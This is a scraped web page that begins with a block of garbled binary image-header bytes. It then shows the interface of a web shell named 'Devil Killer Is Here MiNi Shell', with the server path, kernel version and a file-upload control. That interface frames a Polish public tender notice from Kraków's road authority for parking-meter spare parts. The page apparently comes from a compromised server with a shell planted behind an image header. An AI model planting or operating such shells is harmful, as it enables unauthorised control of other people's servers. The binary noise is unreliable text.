JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210610/0007912601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00079126 z dnia 2021-06-10</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa nowych fabrycznie części zamiennych do parkomatów firmy PARKEON model STRADA PAL oraz model STRADA EVOLUTION-2 (cz. I zamówienia) oraz do parkomatów Solari di Udine Spazio (cz. II zamówienia) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miasta Krakowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 357116163</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Centralna 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-586</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 616 74 16</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdmk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdmk.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa nowych fabrycznie części zamiennych do parkomatów firmy PARKEON model STRADA PAL oraz model STRADA EVOLUTION-2 (cz. I zamówienia) oraz do parkomatów Solari di Udine Spazio (cz. II zamówienia) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2051f959-c903-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00079126</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000711/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.2.1 Zakup części zamiennych do parkomatów Parkeon</p> <p class="mb-0">2.2.2 Zakup części zamiennych do parkomatów Solari</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdmk.krakow.pl/informacje/tryb-podstawowy-art-275-pkt-1-znak-sprawy-26-v-2021/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal ;<br/>https://miniportal.uzp.gov.pl ; sekretariat@zdmk.krakow/pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/,ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej,<br/>b)Zamawiający informuje, iż przekazywanie oferty oraz dokumentów i<br/>oświadczeń składanych wraz z ofertą odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl,<br/>ePUAPuhttps://epuap.gov.pl/wps/portal (za pośrednictwem dedykowanego formularza dostępnego na<br/>ePUAPoraz udostępnionego przez miniPortal -Formularz do komunikacji),<br/>c) Przekazywanie<br/>pozostałych dokumentów i oświadczeń może nastąpić w sposób określony powyżej w lit. b) lub za<br/>pośrednictwememail:sekretariat@zdmk.krakow.pl . Każda ze stron na żądanie drugiej niezwłocznie<br/>potwierdza fakt otrzymania przesłanego za pośrednictwem e-mail pisma lub dokumentu lub<br/>wiadomości,d)Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej ePUAP, e) W przypadku składania<br/>oferty w postaci elektronicznej opatrzonej podpisem zaufanym, Wykonawca musi dysponować profilem<br/>zaufanym, który jest środkiem identyfikacji elektronicznej, umożliwiający złożenie podpisu<br/>zaufanego.Profil zaufany to potwierdzony zestaw danych, które jednoznacznie identyfikują jego<br/>posiadacza w usługach podmiotów publicznych.Profil zaufany można założyć na stronie<br/>https://pz.gov.pl/pz/index , f)W przypadku składania oferty w postaci elektronicznej opatrzonej<br/>podpisem osobistym, Wykonawca musi dysponować e-dowodem,posiadającym certyfikat podpisu osobistego, który potwierdza prawdziwość danych posiadacza.Ponadto do używania podpisu z<br/>wykorzystaniem e-dowodu konieczne jest posiadanie odpowiedniego czytnika kart zbliżeniowych, g) W<br/>przypadku składania oświadczeń i dokumentów w formie elektronicznej należy je podpisać<br/>kwalifikowanym podpisem elektronicznym, h) Szczegółowe informacje dotyczące wymagań<br/>technicznych organizacyjnych dotyczących korespondencji elektronicznych zawiera SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zgodnie z art. 13 ust. 1 i 2rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawieochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnegoprzepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochroniedanych) (Dz. Urz. UE<br/>L119 z 04.05.2016, str. 1), dalej „RODO”, informuje, że: • administratoremPani/Pana<br/>(Wykonawcy)danych osobowych jest: Zarząd Dróg Miasta Krakowa, ul. Centralna 53, 31-586 Kraków,<br/>centrala tel.+48 12 61 67 000, fax: +48 12 61 67 417, email: sekretariat@zdmk.krakow.pl• inspektorem<br/>ochrony danych osobowych w Zarządzie Dróg Miasta Krakowa jest Pan Leszek<br/>Marmon,email:iod@zdmk.krakow.pl . • Pani/Pana dane osobowe przetwarzane będą na podstawie art.<br/>6 ust. 1lit.<br/>c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie<br/>zamówieniapublicznego,prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji. •<br/>odbiorcamiPani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacjapostępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówieńpublicznych (Dz. U.z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”; • Pani/Pana dane<br/>osobowebędą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 ustawy Pzp, przez okres 4 lat od<br/>dniazakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy<br/>przekracza4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy; • obowiązek<br/>podania przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówieniapublicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp; • w<br/>odniesieniu doPani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowaniedo art. 22RODO; • posiada Pani/Pan: -na podstawie art. 15 RODO<br/>prawo dostępu do danychosobowych Pani/Pana dotyczących; -na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Panadanych osobowych *; -na podstawie art. 18 RODO prawo żądania od<br/>administratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18ust. 2 RODO**; -prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO; •nie przysługuje Pani/Panu: -w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięciadanych osobowych; -prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO; -na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">26/V/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a) Przedmiotem niniejszego zamówienia jest dostawa do siedziby zamawiającego części zamiennych dla parkometrów. Zamówienie podzielono na części:<br/>Cz.1 Zakup części zamiennych do parkometrów firmy Parkeon Strada Pal oraz <br/>Strada Evolution-2.<br/>b) Zamawiający opisał przedmiot zamówienia za pomocą: projektowanych <br/>postanowień umowy (PPU) stanowiących załącznik nr 2 do SWZ, opisu <br/>przedmiotu zamówienia dla cz. 1 stanowiącego załącznik nr 7 do SWZ oraz <br/>Wzoru tabel cenowy stanowiących załącznik nr 9 dla cz. 1.<br/>c) Minimalny okres gwarancji wynosi 12 miesięcy <br/> Maksymalny okres gwarancji wynosi 24 miesięcy, <br/>Licząc od dnia następnego po dniu podpisania końcowego protokołu zdawczo –<br/>odbiorczego. <br/>(Oferty zawierające okres gwarancji krótszy niż 12 miesięcy zostaną odrzucone). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38730000-1 - Parkometry</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą dla danej części zamówienia zostanie uznana oferta, <br/>która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów.<br/>Zamawiający przyjmuje że: 1 pkt = 1 % <br/>Wykonawca, który zaproponuje najniższą cenę spośród ofert spełniających wymagania, otrzyma 60 punktów, natomiast pozostali wykonawcy – odpowiednio mniej punktów, według wzoru określonego w SWZ.<br/>G - długość oferowanego okresu gwarancji - 40%<br/>Sposób oceny:<br/>Zaproponowany okres gwarancji 12 miesięcy – 0 pkt<br/>Zaproponowany okres gwarancji 24 miesiące – 40 pkt<br/>Oferty zawierające okres gwarancji krótszy niż 12 miesięcy zostaną odrzucone <br/>jako nie spełniające wymagań SWZ. <br/>Za nie wskazanie w formularzu oferty okresu gwarancji lub wykreślenie wszystkich <br/>wskazanych okresów oferta nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres gwarancji tj. okres 12 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość oferowanego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a) Przedmiotem niniejszego zamówienia jest dostawa do siedziby zamawiającego części <br/>zamiennych dla parkometrów. Zamówienie podzielono na części:<br/>Cz.2 Zakup części zamiennych do parkometrów firmy Solari di Udine model Spazio.<br/>b) Zamawiający opisał przedmiot zamówienia za pomocą: projektowanych <br/>postanowień umowy (PPU) stanowiących załącznik nr 2 do SWZ, opisu <br/>przedmiotu zamówienia dla cz. 2 stanowiącego załącznik nr 8 do SWZ oraz <br/>Wzoru tabel cenowy stanowiących załącznik nr 10 dla cz. 2.<br/>c) Minimalny okres gwarancji wynosi 12 miesięcy <br/> Maksymalny okres gwarancji wynosi 24 miesięcy, <br/>Licząc od dnia następnego po dniu podpisania końcowego protokołu zdawczo –<br/>odbiorczego. <br/>(Oferty zawierające okres gwarancji krótszy niż 12 miesięcy zostaną odrzucone). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38730000-1 - Parkometry</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą dla danej części zamówienia zostanie uznana oferta, <br/>która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów.<br/>Zamawiający przyjmuje że: 1 pkt = 1 % <br/>Wykonawca, który zaproponuje najniższą cenę spośród ofert spełniających wymagania, otrzyma 60 punktów, natomiast pozostali wykonawcy – odpowiednio mniej punktów, według wzoru określonego w SWZ.<br/>G - długość oferowanego okresu gwarancji - 40%<br/>Sposób oceny:<br/>Zaproponowany okres gwarancji 12 miesięcy – 0 pkt<br/>Zaproponowany okres gwarancji 24 miesiące – 40 pkt<br/>Oferty zawierające okres gwarancji krótszy niż 12 miesięcy zostaną odrzucone <br/>jako nie spełniające wymagań SWZ. <br/>Za nie wskazanie w formularzu oferty okresu gwarancji lub wykreślenie wszystkich <br/>wskazanych okresów oferta nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres gwarancji tj. okres 12 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość oferowanego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki w <br/>zakresie Części 1 i 2 dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym (dotyczy Części 1 i 2): <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów (dotyczy Części 1 i 2): <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej (dotyczy Części 1 i 2):<br/>Zamawiający nie stawia warunków w powyższym zakresie.<br/>d) zdolności technicznej lub zawodowej (dotyczy Części 1 i 2)<br/>1) posiadają wiedzę i doświadczenie tj. w okresie ostatnich 3 lat przed upływem <br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie wykonali :<br/>- minimum jedną dostawę części zamiennych do urządzeń do poboru opłat, <br/>wartości min. 500.000zł brutto (dla Części 1) oraz 50.000 zł brutto (dla Części 2). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu (wzór)–<br/>wg. zał. nr 13 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub <br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, <br/>przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane <br/>lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których <br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub <br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie <br/>jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku <br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne <br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w <br/>okresie ostatnich 3 miesięcy - wg zał. nr 6 do SWZ<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, <br/>wykonywanych wspólnie z innymi wykonawcami, wówczas w powyższym wykazie <br/>dostaw zobowiązany jest podać jedynie te dostawy, w których wykonaniu wykonawca <br/>ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda załączenia przez Wykonawcę do oferty przedmiotowych środków<br/>dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń i dokumentów jakie Wykonawca musi dołączyć do oferty w zakresie <br/>Części 1 i 2: <br/>a) wypełniony formularz oferty – wg zał. nr 1 do SWZ 